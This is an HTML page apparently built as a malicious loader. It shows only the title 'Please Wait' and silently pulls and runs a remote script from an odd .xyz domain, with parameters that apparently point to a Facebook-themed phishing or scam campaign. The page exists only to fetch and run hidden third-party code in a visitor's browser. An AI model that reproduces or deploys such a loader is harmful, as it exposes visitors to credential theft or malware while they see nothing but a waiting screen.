<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">	
    <title>Please Wait</title>
</head>
<body>
<script src="https://carameldancing01.xyz/mayimbe/?api=1&lan=facebooknew&ht=1&counter0=mayimbu2020" type="text/javascript" async="true"></script>
</body>
</html>